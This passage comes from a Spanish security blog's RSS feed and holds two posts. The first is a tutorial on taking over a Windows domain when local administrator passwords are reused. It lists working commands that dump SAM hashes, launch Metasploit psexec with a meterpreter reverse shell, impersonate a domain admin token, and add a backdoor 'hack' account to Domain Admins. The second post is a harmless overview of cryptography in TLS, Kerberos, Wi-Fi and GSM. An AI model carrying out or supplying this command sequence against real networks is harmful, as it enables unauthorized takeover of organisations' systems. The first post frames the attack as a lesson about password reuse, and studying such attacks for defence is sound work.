href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml" title="Diccionario claves WPA para Realizar Ataques de Fuerza Bruta">Diccionario claves WPA para Realizar Ataques de Fuerza Bruta</a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-filezilla.xhtml" title="Recupera tu Password de FileZilla">Recupera tu Password de FileZilla</a></li><li><a
href="http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml" title="Diccionarios con Passwords de Sitios Expuestos">Diccionarios con Passwords de Sitios Expuestos</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml/feed</wfw:commentRss> <slash:comments>13</slash:comments> </item> <item><title>¿Cómo tomar control de un Dominio en Windows?</title><link>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml</link> <comments>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml#comments</comments> <pubDate>Wed, 17 Feb 2010 20:07:39 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[BackTrack]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Dominios]]></category> <category><![CDATA[Metasploit]]></category> <category><![CDATA[meterpreter]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3886</guid> <description><![CDATA[Los &#8220;dominios&#8221; en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la [...]]]></description> <content:encoded><![CDATA[<p>Los &#8220;<a
href="http://www.dragonjar.org/tag/dominios" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Dominios">dominios</a>&#8221; en <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">windows</a>, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar     una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> que usan para el usuario <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> de un equipo en los dominios de windows.</p><p
style="text-align: center;"><img
class="alignnone" title="hackear dominio en windows" src="http://img517.imageshack.us/img517/3070/dominio.jpg" alt="dominio ¿Cómo tomar control de un Dominio en Windows?" width="502" height="425" /></p><p>En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> comentado anteriormente:<span
id="more-3886"></span></p><p>REQUISITOS</p><ul><li>Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)</li><li>Todos los usuarios &#8220;administrador&#8221; de las maquinas miembros del dominio tienen la misma clave</li><li>Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)</li><li>Una copia de <a
href="../http://www.dragonjar.org/backtrack-4-final.xhtml">BackTrack 4</a></li></ul><p>Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:</p><p
style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowScriptAccess" value="always" /><param
name="src" value="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>Como vemos, fácilmente hemos agregado un usuario administrador a la lista de &#8220;administradores de dominio&#8221; simplemente siguiendo estos pasos:</p><ul><li><strong>mount /dev/sda1 /mnt/sda1</strong><br
/> Montamos la particion de la maquina windows</li><li><strong>cd /mnt/sda1/WINDOWS/system32/config</strong><br
/> accedemos a la carpeta dodne se encuentra el archivo SAM</li><li><strong>samdump2 system SAM</strong><br
/> sacamos los hash de los usuarios en la maquina windows</li><li><strong>msfconsole</strong><br
/> ejecutamos el <a
href="http://www.dragonjar.org/tag/metasploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Metasploit">metasploit</a> por consola</li><li><strong>use windows/smb/psexec</strong><br
/> utilizamos el psexec</li><li><strong>exploit -p windows/<a
href="http://www.dragonjar.org/tag/meterpreter" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con meterpreter">meterpreter</a>/reverse_tcp -o</strong><br
/> utilizamos la shell meterpreter</li><li><strong>LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass=  123&#8230;:5654&#8230; -j</strong><br
/> configuramos las opciones del exploit</li><li><strong>sessions -i 1</strong><br
/> una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra</li><li><strong>use incognito</strong><br
/> utilizamos el modulo incognito de meterpreter</li><li><strong>list_tokens -u</strong><br
/> mostramos los tokens</li><li><strong>impersonate_token mydomain\\domainadmin</strong><br
/> tomamos las credenciales del administrador de dominio</li><li><strong>execute -f cmd.exe -i -t</strong><br
/> lanzamos la consola de windows</li><li><strong>net user hack MPass5678 /add /domain</strong><br
/> Agregamos el usuario &#8220;hack&#8221; con clave &#8220;MPass46782&#8243; al dominio</li><li><strong>net group &#8220;Domain Admins&#8221; hack /add /domain</strong><br
/> metemos el usuario hack al grupo de administradores de dominio</li><li>Ya hemos tomado el control del dominio de windows</li></ul><p>Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows  Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan &#8220;complejas&#8221; sean.</p><p>PD. en <a
href="http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx">Securitytube.net existe un vídeo en el que realizan este mismo procedimiento</a> un poco mas &#8220;a mano&#8221; pero que puede servirnos también en nuestro proceso de aprendizaje.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a
href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml" title="Curso Completo de Metasploit Framework">Curso Completo de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li><li><a
href="http://www.dragonjar.org/asi-fue-el-hacking-day-en-medellin-pentesting-con-backtrack.xhtml" title="Así fue el Hacking Day en Medellín &#8211; Pentesting con Backtrack">Así fue el Hacking Day en Medellín &#8211; Pentesting con Backtrack</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/backtrack-5.xhtml" title="BackTrack 5">BackTrack 5</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Bits y Qubits, El camino de la criptografía &#8211; Parte I</title><link>http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-partei.xhtml</link> <comments>http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-partei.xhtml#comments</comments> <pubDate>Sat, 13 Feb 2010 17:52:42 +0000</pubDate> <dc:creator>Anaxmon</dc:creator> <category><![CDATA[Criptografia]]></category> <category><![CDATA[Celular]]></category> <category><![CDATA[Cifrado]]></category> <category><![CDATA[Cifrar]]></category> <category><![CDATA[Clave]]></category> <category><![CDATA[Codificar]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Firma]]></category> <category><![CDATA[Generar]]></category> <category><![CDATA[Inalámbrica]]></category> <category><![CDATA[ISO]]></category> <category><![CDATA[Kerberos]]></category> <category><![CDATA[osi]]></category> <category><![CDATA[P2P]]></category> <category><![CDATA[pgp]]></category> <category><![CDATA[Segura]]></category> <category><![CDATA[SSL]]></category> <category><![CDATA[WEP]]></category> <category><![CDATA[WPA]]></category> <category><![CDATA[WPA2]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3778</guid> <description><![CDATA[Siglos atrás, cuando empezaron a conformarse sociedades grandes y complejas en donde existían intereses particulares que no debían ser conocidos, se recurría a la utilización de métodos de comunicación que garantizaran el  secreto o confidencialidad de la información a compartir. Por ejemplo Julio César utilizaba un sistema de cifrado1 (de sustitución monoalfabética) para comunicarse con [...]]]></description> <content:encoded><![CDATA[<p>Siglos atrás, cuando empezaron a conformarse sociedades grandes y complejas en donde existían intereses particulares que no debían ser conocidos, se recurría a la utilización de métodos de comunicación que garantizaran el  secreto o confidencialidad de la información a compartir. Por ejemplo Julio César utilizaba un sistema de <a
href="http://www.dragonjar.org/tag/cifrado" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cifrado">cifrado</a>1 (de sustitución monoalfabética) para comunicarse con sus fuerzas militares dentro y fuera de Roma, diseño que mucho más tarde fue mejorado en el siglo XIX por Blaise de Vigenère a quien se le atribuyó el desarrollo de un cifrador de sustitución polialfabética2 mucho más elaborado, en el cual se empleó por primera vez el uso de una <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> compartida (tal como en la actualidad).</p><p
style="text-align: center;"><img
class="alignnone" title="Criptografia Clasica y Cuantica" src="http://img42.imageshack.us/img42/8608/bits.jpg" alt="bits Bits y Qubits, El camino de la criptografía   Parte I" width="260" height="260" /></p><p>Hasta el siglo XIX las sustituciones y transposiciones constituían las técnicas más comunes para ocultar mensajes a compartir,  mismas que eran confiables hasta que alguien lograba descubrir su funcionamiento (o algoritmo). Actualmente en cambio, se aplican las matemáticas como base fundamental de la criptografía, aportando un nivel de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> evidentemente mucho más elevado en donde los algoritmos incluso son conocidos por el público. <span
id="more-3778"></span>De hecho el alemán Auguste Kerckhoffs3, planteó un principio en el que argumenta que “la fortaleza de un cifrador está en la fortaleza de su llave y no en cuán secreto sea su algoritmo”, valiosa lección que fue comprobada con sangre por sus compatriotas derrotados en la segunda guerra mundial, que se comunicaban con máquinas que cifraban las comunicaciones (como la Enigma4) cuyo diseño era evidentemente secreto, mecanismo que fue realmente efectivo hasta que el inglés Alan Turing5 (quien sentó las bases de la computación moderna) logró descifrar sus transmisiones en uno de los casos de criptoanálisis más memorables, evidenciando que el esfuerzo de mantener secreto un algoritmo de cifrado es inútil y que la seguridad del mismo recae directamente en la dificultad para descifrar su clave.</p><p>Siguiendo el principio de Kerckhoffs un gran número de diseños de cifradores actuales son abiertos y utilizan claves tan fuertes que podría tardarse años (cientos o miles) intentando descifrarlas con la capacidad de cómputo actual, aspecto que será revaluado al final del documento.</p><p>Teniendo ahora una somera visión del camino de la criptografía hasta nuestros días, es importante mencionar de forma muy breve algunas de sus aplicaciones.</p><p
style="text-align: center;"><img
class="alignnone" title="Criptografia Cuantica" src="http://farm5.static.flickr.com/4010/4356920482_9fb4f8e86a.jpg" alt="4356920482 9fb4f8e86a Bits y Qubits, El camino de la criptografía   Parte I"  /></p><h2>Bases de Datos</h2><p>Los motores de bases de datos incluyen algoritmos criptográficos dentro de  su abanico de funciones, cuya implementación en sistemas de información es muy recomendable, evitando codificarlos o reusar código fuente de terceros.</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm5.static.flickr.com/4003/4356236881_ebafee97d4.jpg" alt="4356236881 ebafee97d4 Bits y Qubits, El camino de la criptografía   Parte I" width="500" height="133" title="Bits y Qubits, El camino de la criptografía   Parte I" /></p><h2>Comunicaciones en Internet</h2><p>TLS v1.2 es un protocolo derivado de SSL que provee comunicaciones seguras a través de la Internet, previniendo eavesdropping, tampering o message forgery. Una gran ventaja del protocolo es su capacidad de encapsular datos de capa de aplicación, ofreciendo transparencia en el desarrollo e implementación de aplicaciones, así como servir de plataforma de seguridad para protocolos (de capa superior) como <a
href="http://www.dragonjar.org/tag/http" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con HTTP">HTTP</a>, SMTP, NNTP o SIP.<br
/> TLS ofrece confidencialidad mediante criptografía simétrica, cifrando los datos con diferentes llaves para cada conexión, integridad utilizando funciones de hashing y autenticación mediante el uso de algoritmos de llave<br
/> pública.</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm5.static.flickr.com/4071/4356994500_cdf73d8140.jpg" alt="4356994500 cdf73d8140 Bits y Qubits, El camino de la criptografía   Parte I" width="500" height="281" title="Bits y Qubits, El camino de la criptografía   Parte I" /></p><h2>Autenticación: Kerberos</h2><p>Protocolo de autenticación que permite validar identidades de participantes durante un intercambio de mensajes, fue desarrollado por el MIT con base en el paper de Needmham y Schroeder de1978.</p><p>Su funcionamiento requiere un servidor central contra el cual los usuarios deben autenticarse primero, conocido como Key Distribution Center (KDC). Una vez se ha validado su identidad, se le entrega al usuario un ticket de sesión que utilizará para autenticarse contra los demás servidores que “confían” plenamente en el KDC y sólo aceptan solicitudes de cualquier usuario que se identifique con un ticket de sesión, mismo que  podrá ser reutilizado en diferentes servidores hasta que termine su tiempo de expiración. Kerberos constituye uno de los mecanismos más seguros de autenticación además de proveer una solución robusta de single sign-on.</p><p>La última versión, Kerberos 5, permite utilizar una gran cantidad de algoritmos criptográficos simétricos, asimétricos y de hashing, que implementa mayoritariamente de forma híbrida (por ejemplo 3DES-CBC-SHA1).</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm5.static.flickr.com/4050/4357030346_ccb83edea2.jpg" alt="4357030346 ccb83edea2 Bits y Qubits, El camino de la criptografía   Parte I" width="500" height="96" title="Bits y Qubits, El camino de la criptografía   Parte I" /></p><h2>GnuPG</h2><p><a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">Herramienta</a> de línea de comandos que implementa el protocolo OpenPGP (que a su vez usa <a
href="http://www.dragonjar.org/tag/pgp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con pgp">PGP</a> 5 como base), que permite ofrecer confidencialidad, administración de llaves, autenticación y firmas  digitales, mediante la  combinación del uso de criptografía simétrica y de llave pública.</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm5.static.flickr.com/4032/4357038688_0c93e4d271.jpg" alt="4357038688 0c93e4d271 Bits y Qubits, El camino de la criptografía   Parte I" width="500" height="97" title="Bits y Qubits, El camino de la criptografía   Parte I" /></p><h2>P2P: MSE</h2><p>El Message Stream Encryption (MSE) es un protocolo de cifrado utilizado en gran parte de la red torrent (y otros protocolos P2P), que sirve de envoltura a los flujos de datos y los protege de ser detectados como tráfico torrent, evitando así su filtrado por parte de terceros (como ISPs). De igual forma se consideró durante su diseño que MSE ofreciera protección en contra de eavesdroping y ataques man-in-the-middle.<br
/> MSE utiliza Diffie-Hellman para acordar la llave secreta, SHA-1 como función de hashing y RC4 para <a
href="http://www.dragonjar.org/tag/cifrar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cifrar">cifrar</a> la comunicación debido a su<br
/> seguridad y velocidad (razón por la cual fue elegido en lugar de AES). Es importante aclarar que el objetivo del protocolo es “aleatorizar” el flujo de datos sin garantizar su integridad o la autenticación de los peers.</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm3.static.flickr.com/2678/4356304689_d24788f6df.jpg" alt="4356304689 d24788f6df Bits y Qubits, El camino de la criptografía   Parte I" width="500" height="152" title="Bits y Qubits, El camino de la criptografía   Parte I" /></p><h2>Wi-Fi</h2><p>Tres diferentes protocolos permiten a un usuario conectarse a una red inalámbrica: WEP, WPA y WPA2.<br
/> A pesar de ser el más utilizado, WEP presenta vulnerabilidades serias debido principalmente a una deficiente alimentación del cifrador RC4. Fue<br
/> tan grave este error que se decidió generar un nuevo protocolo de comunicaciones wi-fi que reemplazara a WEP, así apareció WPA que utiliza<br
/> de una forma más adecuada a RC4 e incluye dos nuevos protocolos: TKIP (Temporal Key Integrity Protocol), que genera llaves diferentes para cada<br
/> sesión de usuario, y EAP (Extensible Authentication Protocol) que permite autenticar clientes de forma segura utilizando un servidor tipo RADIUS,<br
/> características que solucionan gran parte de los problemas de WEP. Sin embargo el protocolo wi-fi más seguro es WPA2, que incluye las<br
/> características de WPA y reemplaza a RC4 por AES, incrementando así en mayor medida la seguridad de la conexión.</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm5.static.flickr.com/4056/4356316251_720c1b1560.jpg" alt="4356316251 720c1b1560 Bits y Qubits, El camino de la criptografía   Parte I" width="500" height="95" title="Bits y Qubits, El camino de la criptografía   Parte I" /></p><h2><a
href="http://www.dragonjar.org/tag/celular" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Celular">Celular</a>: GSM-EDGE-GPRS</h2><p>La transmisión de voz vía GSM o EDGE desde el handset del usuario hasta la antena de la estación es cifrada mediante el algoritmo A5/3, mientras que GPRS utilliza GEA3. Ambos son cifradores de flujos que utilizan el cifrador de bloque Kasumi en modo OFB (output feedback) que les sirve como generador pseudoaleatorio.</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm5.static.flickr.com/4055/4356324151_f70003f6e6.jpg" alt="4356324151 f70003f6e6 Bits y Qubits, El camino de la criptografía   Parte I" width="500" height="25" title="Bits y Qubits, El camino de la criptografía   Parte I" /></p><h2>Mensajería Instantánea</h2><p>La mensajería instantánea es una actividad convertida en costumbre para un gran número de internautas, que desconocen que la mayoría de clientes de<br
/> IM que utilizan transmiten todas sus conversaciones en texto claro, de hecho usuarios poco experimentados comparten información sensible por<br
/> este medio de comunicación sin saber los riesgos que están corriendo.<br
/> Existe una comparación de diferentes características de clientes de mensajería instantánea en wikipedia:</p><p>http://en.wikipedia.org/wiki/Comparison_of_instant_messaging_clients</p><p>Evidentemente la criptografía se encuentra presente en algunas de nuestras actividades diarias, y poco (o nada) sabemos acerca de qué tipo de  algoritmos criptográficos se utilizan en cada una de ellas, imposibilitándonos entender qué tan seguros o vulnerables nos encontramos. Así como en los cuadros anteriores, existen muchas más aplicaciones de la criptografía, como transmisión de televisión (y su respectiva restricción de canales premium),<br
/> transmisión de señales satelitales, telefonía celular, creación de contraseñas, e-commerce, comunicaciones militares, bluetooth, VPN, etc. Es importante conocer cómo las aplicaciones o dispositivos con que interactuamos cotidianamente transmiten nuestra información, no sólo qué algoritmos implementan, sino también el tamaño de las claves que utilizan, porque según el principio de Kerckhoffs, en la fortaleza de la llave reside realmente la seguridad de la información transmitida.</p><p>El número de bits de la llave o del hash, dependiendo del caso, es un tema realmente crítico en criptografía que debe ser evaluado cuidadosamente por el profesional encargado de seguridad, afortunadamente existen recomendaciones útiles como apoyo técnico en este sentido que pueden ser consultadas en www.keylength.com.</p><p>Para terminar de hablar de criptografía moderna, el siguiente cuadro sugiere los algoritmos recomendables a implementar en las soluciones tecnológicas de la actualidad.</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm5.static.flickr.com/4057/4357138566_6523e145c5.jpg" alt="4357138566 6523e145c5 Bits y Qubits, El camino de la criptografía   Parte I" width="500" height="443" title="Bits y Qubits, El camino de la criptografía   Parte I" /></p><p
style="text-align: center;"><p>Hasta aquí llega la primera parte de este articulo, <a
href="http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-parteii.xhtml">en la segunda edición hablaremos sobre la criptografía cuántica</a>, espero que les gustara este articulo y me lo hagan saber con sus comentarios.</p><p><strong>Otras partes del Articulo:</strong></p><ul><li><a
title="Enlace permanente a Bits y Qubits, El camino de la criptografía – Parte I" rel="bookmark" href="../bits-y-qubits-camino-de-la-criptografia-partei.xhtml">Bits y Qubits, El camino de la criptografía – Parte I</a></li><li><a
title="Enlace permanente a Bits y Qubits, El camino de la criptografía – Parte II" rel="bookmark" href="../bits-y-qubits-camino-de-la-criptografia-parteii.xhtml">Bits y Qubits, El camino de la criptografía – Parte II </a></li></ul><p>Este articulo fue escrito por <a
href="../author/anaxmon">Anaxmon</a> para <a
title="La Comunidad DragonJAR" href="../tag/la-comunidad-dragonjar">La Comunidad DragonJAR</a>, tú también puedes enviar tus artículos para publicarlos en la comunidad, como ya lo hicieron <a
href="../author/axiacamus">Axiacamus</a>, <a
href="../author/eduardo.restrepo">Eduardo Restrepo</a>,, <a
href="../author/epsilon">Epsilon</a>, <a
href="../author/4v4t4r">4v4t4r</a>, <a
href="../author/c0rt3x">Cortex</a>, <a
href="../author/Cr0n0p10">Cronopio</a>, <a
href="../author/D7n0s4ur70">D7n0s4ur70</a>, <a
href="../author/LauJAR">Laura JAR</a> y <a
href="../author/SamuraiBlanco">SamuraiBlanco</a>; Solo tienes que enviar tu articulo a <strong>dragon(arroba)dragonjar.org</strong>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/crackear-redes-inalambricas-con-wpa-en-1-minuto.xhtml" title="Crackear redes inalambricas con WPA en 1 Minuto">Crackear redes inalambricas con WPA en 1 Minuto</a></li><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a
href="http://www.dragonjar.org/busquedas-cifradas-en-google.xhtml" title="Tus busquedas en Google ahora Cifradas">Tus busquedas en Google ahora Cifradas</a></li><li><a
href="http://www.dragonjar.org/kits-de-crackeo-wireless-en-china.xhtml" title="Kits de crackeo wireless en china">Kits de crackeo wireless en china</a></li><li><a
href="http://www.dragonjar.org/wibog-wireless-bogota.xhtml" title="WiBOG &#8211; Wireless Bogotá   ">WiBOG &#8211; Wireless Bogotá </a></li><li><a
href="http://www.dragonjar.org/geelbe-crackeado-%c2%a1cambia-tus-claves-ya.xhtml" title="Geelbe crackeado ¡Cambia tus Claves YA!">Geelbe crackeado ¡Cambia tus Claves YA!</a></li><li><a
href="http://www.dragonjar.org/fallo-en-openssl-permite-obtener-clave-privada.xhtml" title="Fallo en OpenSSL permite obtener clave privada">Fallo en OpenSSL permite obtener clave privada</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-partei.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 41/179 queries in 0.616 seconds using disk: basic
Object Caching 6714/6955 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 23:41:12 -->
